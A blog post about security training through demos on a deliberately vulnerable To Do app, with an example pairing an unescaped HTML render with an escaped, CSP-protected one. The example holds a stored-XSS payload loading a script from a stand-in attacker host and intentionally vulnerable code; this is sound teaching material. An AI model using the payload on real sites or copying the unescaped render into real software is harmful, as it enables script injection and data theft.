Security Demos

3 min read · 562 words

As someone who has been handling both engineering and information security programs for years now, I find myself obliged to provide information security training to my engineers. I believe a builder's mindset is very different from a breaker's mindset. But I observed that when you show good builders how their code can be broken, they become extremely cautious, and not only do they try to protect their own codebases, but they also help others protect theirs.

As the engineering org was growing rapidly at slice, I saw that the engineers were making the exact same mistakes repeatedly in the codebase and were overlooking security validations most of the time. While we had a very high bar for engineering talent, I realised that the problem was not related to skill or intention; the problem was a knowledge gap. A knowledge gap can be filled by providing training. So I came up with the idea of creating a virtual team: every pod would nominate one engineer who would get trained on information security and be responsible for all the security activities in their respective team.

I thought that the textbook way of teaching information security would be just throwing jargon around. So I started creating small demos. I created a small To Do List application in the MEAN stack, and every week I would try to break the application in a different way and, at the same time, propose mechanisms to safeguard the app. The first demo was about adding an XSS script to the To Do list and allowing a script hosted on another domain to run on the app. When I showed it to the virtual team, they started asking more questions following the "What happens when XYZ?" template. I realised that I had their attention on security. That gave me the motivation to create even more demos. In the following week, I created demos about conducting CSRF attacks, the types of CSRF attacks, and how to mitigate them. Later, I got requests from a few engineers who wanted to join the virtual security team because their friends had told them about the demos. I kept adding more demos about SQL injection, malicious file uploads, RegEx DoS, etc., as the team size increased. At one point, I decided to convert this repo into a training module and provide the training to the entire team.

Even today, I conduct these sessions for my engineering teams, and I get asked very interesting questions by the team members.

Only this time, I asked Google Antigravity to add a few more demos to it using Gemini Flash 3, and it did an amazing job. You can find the complete set of demos in the security-demos repository.

The repo is quite self-explanatory. Each folder in the repo contains an unsecured application, an attack vector, and a secure application. Also, each folder has a README.md file that clearly states the objective of the attack, the prerequisites, the steps to set up the environment for conducting the attack, the steps to conduct the demo, and ways to mitigate the attack.
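To show what such an unsecured/secure pair looks like in practice, here is an added example built around the first demo described above: a stored XSS in a Node To Do list that pulls a script from another origin. This is illustrative code written for this post, not code from the security-demos repo; the item texts, the `attacker.example` domain and the `/unsafe` and `/safe` routes are constructed for the demo.

```javascript
// Added example, not from the security-demos repo. A stored-XSS demo in the
// shape of the To Do list app: one render trusts stored item text (unsecured),
// the other escapes it and adds a Content-Security-Policy (secure).

// Constructed To Do "database": a normal item plus a malicious one that tries
// to load a script from another origin (attacker.example is an assumed host).
const todos = [
  'Buy milk',
  '<script src="https://attacker.example/steal.js"></script>',
];

// Unsecured: item text is concatenated straight into the HTML, so a browser
// executes the injected <script> and fetches steal.js from the other origin.
function renderTodosUnsafe(items) {
  return '<ul>' + items.map(t => `<li>${t}</li>`).join('') + '</ul>';
}

// Mitigation 1: escape the characters that let text break out of an HTML text
// node or attribute, so the payload is displayed as literal text instead.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function renderTodosSafe(items) {
  return '<ul>' + items.map(t => `<li>${escapeHtml(t)}</li>`).join('') + '</ul>';
}

// Mitigation 2 (defence in depth): a CSP that only allows scripts from the
// app's own origin, so even an escaping slip cannot load code from elsewhere.
const CSP = "default-src 'self'; script-src 'self'; object-src 'none'";

// Demo check: does the rendered page still contain a live <script> tag whose
// src points to another origin?
function containsExternalScript(html) {
  return /<script\b[^>]*\bsrc\s*=\s*["'](?:https?:)?\/\//i.test(html);
}

// Route handler returning a plain object so it can be tested without sockets.
// Routes /unsafe and /safe are constructed for this demo.
function handleRequest(url) {
  const secure = url === '/safe';
  const headers = { 'Content-Type': 'text/html; charset=utf-8' };
  if (secure) headers['Content-Security-Policy'] = CSP;
  return {
    status: 200,
    headers,
    body: secure ? renderTodosSafe(todos) : renderTodosUnsafe(todos),
  };
}

// Optional: serve both pages for a live demo in a browser, e.g. startServer(3000)
// then open http://localhost:3000/unsafe and http://localhost:3000/safe.
function startServer(port) {
  const http = require('http');
  return http.createServer((req, res) => {
    const r = handleRequest(req.url);
    res.writeHead(r.status, r.headers);
    res.end(r.body);
  }).listen(port);
}
```

In a browser, `/unsafe` will attempt to load `https://attacker.example/steal.js` (the network tab shows the request even though the host does not exist), while `/safe` shows the payload as text and the CSP blocks any off-origin script that might slip through.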

I hope you find this useful and are able to learn about different types of attacks and how to mitigate them.